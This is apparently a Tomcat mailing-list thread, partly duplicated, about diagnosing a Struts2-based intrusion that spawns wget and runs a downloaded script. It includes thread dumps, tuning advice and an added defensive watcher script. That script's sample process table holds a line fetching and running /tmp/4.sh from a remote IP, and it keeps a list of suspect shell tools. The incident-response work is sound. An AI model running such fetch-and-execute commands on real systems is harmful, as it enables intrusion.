Posted to users@tomcat.apache.org by Cédric Couralet <ce...@gmail.com> on 2014/05/01 16:00:12 UTC
Re: Regarding i think an intrusion
2014-04-30 19:07 GMT+02:00 Christopher Schultz <chris@christopherschultz.net>:
>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> > Im uploading mi logfiles so it will be available when finished
> > uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a copy
> in case the attacker tries to clean-up after themselves. That's
> certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict outgoing
> requests so that the attack can't progress across your network.
>
> > Regarding the configuration, its working in two other sites
> > without problem, and there is no problem putting L4 balancing with
> > haproxy.
> >
> > I have asked developers about that exploit, still without answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you can
> probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
> section on this page).
> Of course, the vulnerability doesn't allow you to simply inject code
> or anything like that: you can certainly mess-around with code that is
> already available on the site, though.
>
>
I think the S2-021 can be used to inject code. There is a POC circulating
proving it.
That said, this struts version (2.1.8) is also vulnerable to
http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code
execution very easily.
> -chris
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Well well well. Thank you all so much!!!
Since the Struts upgrade I got no intrusion on my servers =) =)
Thank you list for the support, for the time and for helping me with this issue.
Yours,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-20 12:45 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello all, again it's me =)
>
> Just to let you know that today we deployed our apps using struts 2.3.16.2
>
> So from today I will monitor those servers very closely =)
>
> Thanks all people. I will tell you how things go.
>
> Regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
> 2014-05-07 12:28 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
>
>> Hello all!
>>
>> Developers are still "estimating the effort" for upgrading struts.... I
>> will let you know how things are going.
>>
>> Thanks all for replying to me.
>>
>> Regards,
>> Leonardo
>>
>> Saludos.-
>> Leonardo Santagostini
>>
>> <http://ar.linkedin.com/in/santagostini>
>>
>>
>>
>>
>>
>> 2014-05-05 15:39 GMT-03:00 Martin Gainty <mg...@hotmail.com>:
>>
>>> > Subject: Re: Regarding i think an intrusion
>>> > From: lsantagostini@gmail.com
>>> > To: users@tomcat.apache.org
>>> >
>>> > Hello Chris, but this logfile was only one day.
>>> MG>Ay Caramba!
>>> >
>>> > Maybe I had a concept mismatch trying to capture the exact moment when
>>> > the execution begins.
>>> >
>>> > My command was
>>> >
>>> > while [ true ]; do
>>> >   CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v "127.0.0.1" | wc -l)
>>> >   if [ $CUENTO -gt 0 ] ; then
>>> >     PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }')
>>> >     echo -e "Se encontro wget corriendo, sacando dump de JVM..."
>>> >     kill -3 $PIDJAVA
>>> >   fi
>>> >   sleep 3
>>> > done
>>> >
>>> > Maybe too many dumps all together; now I'm trying to get a "live"
>>> > capture without luck =(
>>> >
>>> > If you know a better method, please let me know.
>>> >
>>> > Thanks for your effort, kind regards,
>>> > Leonardo
>>> >
>>> > Saludos.-
>>> > Leonardo Santagostini
>>> MG>Tomcat APR cannot use WebSockets with JDK 1.6 ... you need to
>>> use JDK 1.7 (now)
>>> MG>this:
>>> "ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10
>>> tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
>>> java.lang.Thread.State: TIMED_WAITING (sleeping)
>>> at java.lang.Thread.sleep(Native Method)
>>> at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
>>> at java.lang.Thread.run(Thread.java:662)
>>> MG>These informational log entries produce a LOT of noise
>>> MG>log4j.properties
>>> MG>log4j.logger.org.quartz=OFF //(shut Quartz up)
>>>
>>> MG>that:
>>> "ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656
>>> runnable [0x0000000046f34000]
>>> java.lang.Thread.State: RUNNABLE
>>> at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
>>> at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
>>> at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
>>> at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
>>> at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
>>> MG>TOO MUCH!
>>> MG>you need to change match-type from regex to wildcard in Tuckey
>>> .\WEB-INF\urlrewrite.xml ... for example
>>> <!-- regex is not necessary -->
>>> <!-- rule match-type="regex">
>>> <name>BasicRule</name>
>>> <from>basicfrom</from>
>>> <to>basicto</to>
>>> </rule -->
>>> <rule match-type="wildcard">
>>> <name>BasicRule</name>
>>> <from>basicfrom</from>
>>> <to>basicto</to>
>>> </rule>
>>> MG>you can see that name, from and to are the same
>>>
>>> MG>Every time you see 'Runnable' and 'locked' (for example)
>>> "http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d
>>> waiting on condition [0x000000004ad9b000]
>>> java.lang.Thread.State: RUNNABLE
>>> at java.util.Vector.addElement(Vector.java:572)
>>> - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
>>> at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
>>> at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
>>> - locked <0x00000006e0303d80> (a java.util.Hashtable)
>>>
>>> MG>you need to kill the process or change the slow process ... (log4j
>>> updateParents), for example in log4j
>>> package org.apache.log4j;
>>> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
>>> org.apache.log4j.spi.RendererSupport{
>>> private org.apache.log4j.spi.LoggerFactory defaultFactory;
>>> private java.util.Vector listeners;
>>> // Hashtable ht;  (keys are CategoryKey, values are Logger or ProvisionNode)
>>> java.util.concurrent.ConcurrentHashMap<CategoryKey,Object> ht=new
>>> java.util.concurrent.ConcurrentHashMap<CategoryKey,Object>();
>>>
>>> // much later
>>> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
>>> factory) {
>>> CategoryKey key = new CategoryKey(name);
>>> Logger logger;
>>> Object o = ht.get(key);   // no synchronized(ht) block needed with a ConcurrentHashMap
>>> ....
>>> } else if (o instanceof org.apache.log4j.ProvisionNode) {
>>> //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
>>> logger = factory.makeNewLoggerInstance(name);
>>> logger.setHierarchy(this);
>>> ht.put(key, logger);
>>> updateChildren((ProvisionNode) o, logger);
>>> updateParents(logger);
>>> return logger;
>>> }
>>>
>>>
>>> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
>>> MG>Understand?
>>> MG>Martín
>>>
>>> >
>>> > <http://ar.linkedin.com/in/santagostini>
>>> >
>>> >
>>> >
>>> >
>>> >
>>> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <chris@christopherschultz.net>:
>>> >
>>> > >
>>> > > Leonardo,
>>> > >
>>> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
>>> > > > Ok, again it's uploaded.
>>> > > >
>>> > > > This is the link
>>> > > > https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
>>> > >
>>> > > 1/2 GiB log file? Hrm.
>>> > >
>>> > > It doesn't even have any calls to Runtime.exec in it. If you have a
>>> > > snapshot of a thread dump (and only the thread dump, I don't need 3
>>> > > weeks of your logs) that you took while the "intrusion" was taking
>>> > > place, post that.
>>> > >
>>> > > If you don't, then I think you're out of luck.
>>> > >
>>> > > Sounds like a bad time to go on holiday.
>>> > >
>>> > > -chris
>>>
>>>
>>
>>
>
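The dump-on-wget loop quoted above, reworked from the defender's side as an added example (not code posted in this thread): it requires the suspicious process to actually be a child of the java process, takes one thread dump per new child instead of one every 3 seconds, and keeps a copy of the script the child was started with. DUMP_DIR, STATE_DIR, SUSPECT_CMDS and the sample process table are assumptions of this example.

```shell
#!/bin/sh
# Added example for this thread, not code posted by anyone on the list.
# Watches the Tomcat JVM for unexpected child processes (wget spawned through
# Runtime.exec, as discussed above) and takes exactly ONE thread dump per new
# child, then preserves the script it ran (the thread's /tmp/4.sh) before it
# can be cleaned up. DUMP_DIR, STATE_DIR and SUSPECT_CMDS are assumed names.

DUMP_DIR="${DUMP_DIR:-/var/tmp/jvm-dumps}"
STATE_DIR="${STATE_DIR:-/var/tmp/jvm-dumps/state}"
POLL_SECONDS="${POLL_SECONDS:-3}"
SUSPECT_CMDS="${SUSPECT_CMDS:-wget curl sh bash perl python nc}"

# Read a process table on stdin (columns: PID PPID COMM ARGS...) and print
# "child_pid java_pid comm" for each process whose command name is listed in
# SUSPECT_CMDS and whose parent is a java process. Requiring the java parent
# removes the false positives of a plain "grep wget" (an admin's own wget, or
# one started by cron, has no java parent).
suspicious_children() {
    awk -v suspects="$SUSPECT_CMDS" '
        BEGIN { n = split(suspects, s, " "); for (i = 1; i <= n; i++) want[s[i]] = 1 }
        $1 !~ /^[0-9]+$/ { next }                 # skip the ps header line
        {
            pid[NR] = $1; ppid[NR] = $2; comm[NR] = $3
            if ($3 == "java") isjava[$1] = 1
        }
        END {
            for (r = 1; r <= NR; r++)
                if ((r in comm) && (comm[r] in want) && (ppid[r] in isjava))
                    print pid[r], ppid[r], comm[r]
        }'
}

# Remember which child PIDs have been handled: returns 0 (true) the first
# time a PID is seen and 1 afterwards, so each event yields a single dump.
first_sighting() {
    mkdir -p "$STATE_DIR"
    if [ -e "$STATE_DIR/$1" ]; then
        return 1
    fi
    : > "$STATE_DIR/$1"
    return 0
}

# Thread-dump JVM $1: jstack writes to a file we control; without a JDK,
# kill -3 (SIGQUIT) makes the JVM print the dump to its stdout (catalina.out).
dump_jvm() {
    mkdir -p "$DUMP_DIR"
    stamp=$(date +%Y%m%d-%H%M%S)
    if command -v jstack >/dev/null 2>&1; then
        jstack "$1" > "$DUMP_DIR/threads-$1-$stamp.txt" 2>&1
    else
        kill -3 "$1"
    fi
}

# Save the child's command line and a copy of every existing file named in it
# (the downloaded script), so evidence survives the attacker's clean-up.
preserve_child_artifacts() {
    mkdir -p "$DUMP_DIR"
    cmdfile="$DUMP_DIR/cmdline-$1.txt"
    tr '\0' '\n' < "/proc/$1/cmdline" > "$cmdfile" 2>/dev/null || return 1
    while read -r arg; do
        if [ -f "$arg" ]; then
            cp -p "$arg" "$DUMP_DIR/evidence-$1-$(basename "$arg")"
        fi
    done < "$cmdfile"
}

# Poll loop: one ps snapshot per interval, acting only on first sightings.
watch() {
    while :; do
        ps -eo pid,ppid,comm,args | suspicious_children |
        while read -r cpid jpid comm; do
            if first_sighting "$cpid"; then
                echo "$(date) $comm (pid $cpid) spawned by java (pid $jpid): dumping threads" >&2
                preserve_child_artifacts "$cpid"
                dump_jvm "$jpid"
            fi
        done
        sleep "$POLL_SECONDS"
    done
}

# Constructed ps snapshot (not from the thread's logs) to exercise the filter
# offline: only PID 1345 is a suspect command whose parent is java.
SAMPLE_PS='PID PPID COMMAND COMMAND
1 0 init /sbin/init
1200 1 java /usr/bin/java -Dcatalina.home=/opt/tomcat org.apache.catalina.startup.Bootstrap
1345 1200 wget wget http://203.0.113.5/4.sh -O /tmp/4.sh
1346 1345 sh sh /tmp/4.sh
1400 1 wget wget http://mirror.example/ubuntu.iso'

demo_suspicious() { printf '%s\n' "$SAMPLE_PS" | suspicious_children; }

if [ "${1:-}" = "--watch" ]; then
    watch
fi
```

Run it as `sh watcher.sh --watch` under the same user as Tomcat (or root) so that kill -3 and /proc reads are permitted; the state files mean a restart will not re-dump for children it has already seen.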
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all, again it's me =)
Just to let you know that today we deployed our apps using struts 2.3.16.2
So from today I will monitor those servers very closely =)
Thanks all people. I will tell you how things go.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all!
Developers are still "estimating the effort" for upgrading struts.... I
will let you know how things are going.
Thanks all for replying to me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
> at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
> MG>DEMASIADO!
> MG>necesita cambiar match-type desde regex at wildcard en Tuckey
> .\WEB-INF\urlrewrite.xml...por ejemplo
> <!-- regex no es necessario -->
> <!-- rule match-type="regex">
> <name>BasicRule</name>
> <from>basicfrom</from>
> <to>basicto</to>
> </rule -->
> <rule match-type="wildcard">
> <name>BasicRule</name>
> <from>basicfrom</from>
> <to>basicto</to>
> </rule>
> MG>puedes ver que nombre, desde y a son los mismos
>
> MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
> "http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d
> waiting on condition [0x000000004ad9b000]
> java.lang.Thread.State: RUNNABLE
> at java.util.Vector.addElement(Vector.java:572)
> - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
> at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
> at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
> - locked <0x00000006e0303d80> (a java.util.Hashtable)
>
> MG>necessita mata el proceso o cambia proceso lento ...(log4j
> updateParents) por ejemplo en log4j
> package org.apache.log4j;
> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
> org.apache.log4j.spi.RendererSupport{
> private org.apache.log4j.spi.LoggerFactory defaultFactory;
> private java.util.Vector listeners;
> // Hashtable ht;
> java.util.ConcurrentHashMap<String,ProvisionNode> ht=new
> java.util.ConcurrentHashMap<String,ProvisionNode>();
>
> //mucho mas tarde
> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
> factory) {
> {
> ....
> } else if (o instanceof org.apache.log4j.ProvisionNode) {
> //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
> logger = factory.makeNewLoggerInstance(name);
> logger.setHierarchy(this);
> ht.put(key, logger);
> updateChildren((ProvisionNode) o, logger);
> updateParents(logger);
> return logger;
> }
>
>
> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
> MG>Entiendes?
> MG>Martín
>
> >
> > <http://ar.linkedin.com/in/santagostini>
> >
> >
> >
> >
> >
> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <
> chris@christopherschultz.net
> > >:
> >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA256
> > >
> > > Leonardo,
> > >
> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > > > Ok, again its uploaded.
> > > >
> > > > This is the link
> > > >
> > > >
> > >
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
> > >
> > > 1/2
> > > >
> > > GiB log file? Hrm.
> > >
> > > It doesn't even have any calls to Runtime.exec in it. If you have a
> > > snapshot of a thread dump (and only the thread dump, I don't need 3
> > > weeks of your logs) that you took while the "intrusion" was taking
> > > place, post that.
> > >
> > > If you don't, then I think you're out of luck.
> > >
> > > Sounds like a bad time to go on holiday.
> > >
> > > - -chris
> > > -----BEGIN PGP SIGNATURE-----
> > > Version: GnuPG v1
> > > Comment: GPGTools - http://gpgtools.org
> > > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> > >
> > > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
> > > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
> > > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
> > > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
> > > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
> > > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
> > > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
> > > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
> > > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
> > > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
> > > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
> > > EcwrNcX2iZ+JXXtSTnzH
> > > =nxGK
> > > -----END PGP SIGNATURE-----
> > >
> > > ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> > > For additional commands, e-mail: users-help@tomcat.apache.org
> > >
> > >
>
>
RE: Regarding i think an intrusion
Posted by Martin Gainty <mg...@hotmail.com>.
> Subject: Re: Regarding i think an intrusion
> From: lsantagostini@gmail.com
> To: users@tomcat.apache.org
>
> Hello Chris, but this logfile was only one day.
MG>Ay Caramba!
>
> Maybe I had a concept mismatch trying to capture the exact moment when the
> execution begins.
>
> My command was
>
> while true; do
>   CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v "127.0.0.1" | wc -l)
>   if [ $CUENTO -gt 0 ]; then
>     PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }')
>     echo -e "Se encontro wget corriendo, sacando dump de JVM..."
>     kill -3 $PIDJAVA
>   fi
>   sleep 3
> done
>
> Maybe too many dumps all together, now I'm trying to get a "live" capture
> without luck =(
>
> If you know a better method, please let me know.
>
> Thanks for your effort, kind regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
MG>Tomcat APR cannot use WebSockets with JDK 1.6 ... you need to use JDK 1.7 (now)
MG>this
"ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10 tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
java.lang.Thread.State: TIMED_WAITING (sleeping)
at java.lang.Thread.sleep(Native Method)
at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
at java.lang.Thread.run(Thread.java:662)
MG>These informational log entries produce a LOT of noise
MG>log4j.properties
MG>log4j.logger.org.quartz=OFF //(Quiet, Quartz)
MG>that
"ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656 runnable [0x0000000046f34000]
java.lang.Thread.State: RUNNABLE
at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
MG>TOO MUCH!
MG>you need to change match-type from regex to wildcard in Tuckey .\WEB-INF\urlrewrite.xml... for example
<!-- regex is not necessary -->
<!-- rule match-type="regex">
<name>BasicRule</name>
<from>basicfrom</from>
<to>basicto</to>
</rule -->
<rule match-type="wildcard">
<name>BasicRule</name>
<from>basicfrom</from>
<to>basicto</to>
</rule>
MG>you can see that name, from and to are the same
MG>Whenever you see 'Runnable' and 'locked' (for example)
"http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d waiting on condition [0x000000004ad9b000]
java.lang.Thread.State: RUNNABLE
at java.util.Vector.addElement(Vector.java:572)
- locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
